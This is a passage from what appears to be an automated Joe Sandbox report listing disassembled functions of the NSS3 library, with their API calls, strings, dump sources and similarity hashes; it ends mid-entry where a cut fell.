Function 6C5C8F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C8FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C5C9013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C9042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C5C905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C5C9073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C90EC

Part of subcall function 6C590F00: PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B
Part of subcall function 6C590F00: PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C5BDA9B,?,00000000,?,?,?,?,CE534353), ref: 6C5C9111

Strings

nkl, xrefs: 6C5C90A3

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nkl
API String ID: 2831689957-1663185687
Opcode ID: 788b498f6c07c29a93adbba2df2a500dc417992103c3f7904d7b01402b82a262
Instruction ID: 9111432f5a6273a879879e15e808384085a7248b7c0441087b2f0d5a73e8df18
Opcode Fuzzy Hash: 788b498f6c07c29a93adbba2df2a500dc417992103c3f7904d7b01402b82a262
Instruction Fuzzy Hash: D4517BB5B046458FDB00EFB9C8C8259BBF5AF49318F0549ADDC459B716EB30E884CB92

Function 6C6B7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C6B7CE0

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7D36
PR_Realloc.NSS3(?,00000080), ref: 6C6B7D6D
PR_GetCurrentThread.NSS3 ref: 6C6B7D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C6B7DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7DD8
malloc.MOZGLUE(00000080), ref: 6C6B7DF8
PR_GetCurrentThread.NSS3 ref: 6C6B7E06

Strings

:%s:%d:0x%lx, xrefs: 6C6B7DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C6B7DF0

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 0fcdcbe17847347c489f8f3640515f5496f504f50c3e95912245e7363a60fc16
Instruction ID: 206e739f594a1d45cd942780e2047a26ca33304f5e899cc9cdb18275a9904406
Opcode Fuzzy Hash: 0fcdcbe17847347c489f8f3640515f5496f504f50c3e95912245e7363a60fc16
Instruction Fuzzy Hash: 0341C6B15002059FDB04CF29CC819AB37F6FF85358B25456CE819ABB52D731F861CBA9

Function 6C6B7E20 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103filestringpipeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6B7E37
PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C6B7E46

Part of subcall function 6C591240: TlsGetValue.KERNEL32(00000040,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591267
Part of subcall function 6C591240: EnterCriticalSection.KERNEL32(?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C59127C
Part of subcall function 6C591240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C591291
Part of subcall function 6C591240: PR_Unlock.NSS3(?,?,?,?,6C59116C,NSPR_LOG_MODULES), ref: 6C5912A0

PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C6B7EAF
PR_ImportFile.NSS3(?), ref: 6C6B7ECF
PR_GetCurrentThread.NSS3 ref: 6C6B7ED6
PR_ImportTCPSocket.NSS3(?), ref: 6C6B7F01
PR_ImportUDPSocket.NSS3(?,?), ref: 6C6B7F0B
PR_ImportPipe.NSS3(?,?,?), ref: 6C6B7F15

Strings

NSPR_INHERIT_FDS, xrefs: 6C6B7E41
%d:0x%lx, xrefs: 6C6B7EA9

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
String ID: %d:0x%lx$NSPR_INHERIT_FDS
API String ID: 2743735569-629032437
Opcode ID: dd6ba46e4331501657e15c255324926077e320436b59309e462b49fe30f04f22
Instruction ID: 441c716e2a1cb2c9e07780e3bee7b6852e6db605da67cd2558da8664b747ac2f
Opcode Fuzzy Hash: dd6ba46e4331501657e15c255324926077e320436b59309e462b49fe30f04f22
Instruction Fuzzy Hash: 23313770904119DBDB009B69C840AEBB7A9FF86348F100565E816B7A11E7319D27C7AE

Function 6C5C4E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C4E90
EnterCriticalSection.KERNEL32 ref: 6C5C4EA9
TlsGetValue.KERNEL32 ref: 6C5C4EC6
EnterCriticalSection.KERNEL32 ref: 6C5C4EDF
PL_HashTableLookup.NSS3 ref: 6C5C4EF8
PR_Unlock.NSS3 ref: 6C5C4F05
PR_Now.NSS3 ref: 6C5C4F13
PR_Unlock.NSS3 ref: 6C5C4F3A

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

Strings

bU\l, xrefs: 6C5C4E5C
bU\l, xrefs: 6C5C4F3F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bU\l$bU\l
API String ID: 326028414-2399824368
Opcode ID: 37e7a7b1da29b3e1b9c913d7c9be8f150bfac9585a4013e2de5a61ed26d41e17
Instruction ID: 0d245ed581de3d653e54e9648ab03684f1d420605c2ce309e8102ceb60c8cedb
Opcode Fuzzy Hash: 37e7a7b1da29b3e1b9c913d7c9be8f150bfac9585a4013e2de5a61ed26d41e17
Instruction Fuzzy Hash: 23415BB4A00605DFCB00EF79D4848AABBF4FF49314F018969EC599B711EB30E855CB96

Function 6C5D6C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C5D6C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D6C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D6CA3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D6CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C5D6CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D6C9C
hSession = 0x%x, xrefs: 6C5D6C7E, 6C5D6C8E
nkl, xrefs: 6C5D6CF4, 6C5D6D1F
pMechanism = 0x%p, xrefs: 6C5D6CD0
C_DigestInit, xrefs: 6C5D6C61

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nkl
API String ID: 1003633598-4246847897
Opcode ID: d5922d32dd730da651241e2e5a34b01700353a1f52098e24de288c02d9ef47cc
Instruction ID: 6daed0beb4cfc4cbc21e8f59781c13e34581a465f04744a727de08546de9d584
Opcode Fuzzy Hash: d5922d32dd730da651241e2e5a34b01700353a1f52098e24de288c02d9ef47cc
Instruction Fuzzy Hash: F42139B17003049BD700AF59ED48B4A37B5EB83319F464439E409E7B12DF30A809CB9E

Function 6C5D9DD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6C5D9DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D9E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9E33

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D9E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C5D9E65

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D9E2C
hSession = 0x%x, xrefs: 6C5D9E0E, 6C5D9E1E
flags = 0x%x, xrefs: 6C5D9E60
nkl, xrefs: 6C5D9E7D, 6C5D9EA8
C_SessionCancel, xrefs: 6C5D9DF1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel$nkl
API String ID: 1003633598-1309049317
Opcode ID: c3f2e0757cfe7dcd443ba566ce234995b40433c103b1f7d6fc32bef6bea0bffe
Instruction ID: 58a19d5dda0f28d2670421bdc1e3f4be6017b6f998b408556a9907706645f594
Opcode Fuzzy Hash: c3f2e0757cfe7dcd443ba566ce234995b40433c103b1f7d6fc32bef6bea0bffe
Instruction Fuzzy Hash: F721B4B2701249AFE7009F58DD98B6A37B5EB8231DF454439E409A7711DF34AC48CBAA

Function 6C5EECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C5EDE64), ref: 6C5EED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5EED22

Part of subcall function 6C5FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6D18D0,?), ref: 6C5FB095

PL_FreeArenaPool.NSS3(?), ref: 6C5EED4A
PL_FinishArenaPool.NSS3(?), ref: 6C5EED6B
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5EED38

Part of subcall function 6C524C70: TlsGetValue.KERNEL32(?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524C97
Part of subcall function 6C524C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CB0
Part of subcall function 6C524C70: PR_Unlock.NSS3(?,?,?,?,?,6C523921,6C7014E4,6C66CC70), ref: 6C524CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C5EED52
PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5EED83
PL_FreeArenaPool.NSS3(?), ref: 6C5EED95
PL_FinishArenaPool.NSS3(?), ref: 6C5EED9D

Part of subcall function 6C6064F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C60127C,00000000,00000000,00000000), ref: 6C60650E

Strings

security, xrefs: 6C5EED06

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 21df512ff3fbce7d414d04f3df40d987f7d2ff82ff66dc1732aba9e9a4047c91
Instruction ID: bed7850698839cccbf84e4c95ee19dccf11d1de2fa06473aa9bbf0f722b13900
Opcode Fuzzy Hash: 21df512ff3fbce7d414d04f3df40d987f7d2ff82ff66dc1732aba9e9a4047c91
Instruction Fuzzy Hash: 9B116DB2B00204A7D7149725AE41BBB7278AF4670CF05093CEC5472E41FB64A54CCADF

Function 6C6B0EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C592357), ref: 6C6B0EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C592357), ref: 6C6B0EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C6B0EE6

Part of subcall function 6C6B09D0: PR_Now.NSS3 ref: 6C6B0A22
Part of subcall function 6C6B09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C6B0A35
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C6B0A66
Part of subcall function 6C6B09D0: PR_GetCurrentThread.NSS3 ref: 6C6B0A70
Part of subcall function 6C6B09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C6B0A9D
Part of subcall function 6C6B09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C6B0AC8
Part of subcall function 6C6B09D0: PR_vsmprintf.NSS3(?,?), ref: 6C6B0AE8
Part of subcall function 6C6B09D0: EnterCriticalSection.KERNEL32(?), ref: 6C6B0B19
Part of subcall function 6C6B09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C6B0B48
Part of subcall function 6C6B09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C6B0C76
Part of subcall function 6C6B09D0: PR_LogFlush.NSS3 ref: 6C6B0C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C6B0EFA

Part of subcall function 6C59AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C59AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F2B

Strings

Aborting, xrefs: 6C6B0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C6B0ED9, 6C6B0EE5, 6C6B0F06, 6C6B0F0B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 31fca934aae30f04981ae55b5043bacff35ffa3a922d8363a1ecba9a424b86e6
Instruction ID: 80ca8d378cd9703bbecb067c93fd9ac72598431f862cb7ff7a1bd3fdb318a77c
Opcode Fuzzy Hash: 31fca934aae30f04981ae55b5043bacff35ffa3a922d8363a1ecba9a424b86e6
Instruction Fuzzy Hash: C0F0A4F59001187BEB107B61AC89C9F3E2EDF86264F004424FD1A56602DA35ED2596BB

Function 6C614DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C614DCB

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C614DE1

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C614DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C614E59

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C6D300C,00000000), ref: 6C614EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C614EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C614F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C61521A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 1edff58849d46e50cc132e149d58ef805e9caf9276fb1d9d780c74675a1e9034
Instruction ID: 98d5ab9b9c3083a57557667e3b62fb9099563a5d650dea4f69acfec6918eccd2
Opcode Fuzzy Hash: 1edff58849d46e50cc132e149d58ef805e9caf9276fb1d9d780c74675a1e9034
Instruction Fuzzy Hash: ECF1AD71E08209CFDB04CF59D8407ADB7B2FF8431AF254129E815ABB80E775E982CB94

Function 6C5A4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A502A
PR_NewLock.NSS3(00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A5034
PL_NewHashTable.NSS3(00000000,6C5FFE80,6C5FFD30,6C64C350,00000000,00000000,00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A5055
PL_NewHashTable.NSS3(00000000,6C5FFE80,6C5FFD30,6C64C350,00000000,00000000,?,00000001,00000000,6C6F0148,?,6C5B6FEC), ref: 6C5A506D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: HashLockTable
String ID:
API String ID: 3862423791-0
Opcode ID: 0905bc6132a75e368a81ce5681967ec99df18381044d16ede117fc759c2d6e12
Instruction ID: 7d64ced330b4efaac88f45c7db2918252ea551067d36a7f5737e9bd9556c0c51
Opcode Fuzzy Hash: 0905bc6132a75e368a81ce5681967ec99df18381044d16ede117fc759c2d6e12
Instruction Fuzzy Hash: F431B3F2B016109BEB109BA79C8CB5B37B8AB27388F614139EA15C3A41DBB59405CBD1

Function 6C542E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?), ref: 6C542F3D
memset.VCRUNTIME140(?,00000000,?), ref: 6C542FB9
memcpy.VCRUNTIME140(?,00000000,?), ref: 6C543005
memcpy.VCRUNTIME140(?,?,?), ref: 6C5430EE
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C543131
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C543178

Strings

%s at line %d of [%.10s], xrefs: 6C543171
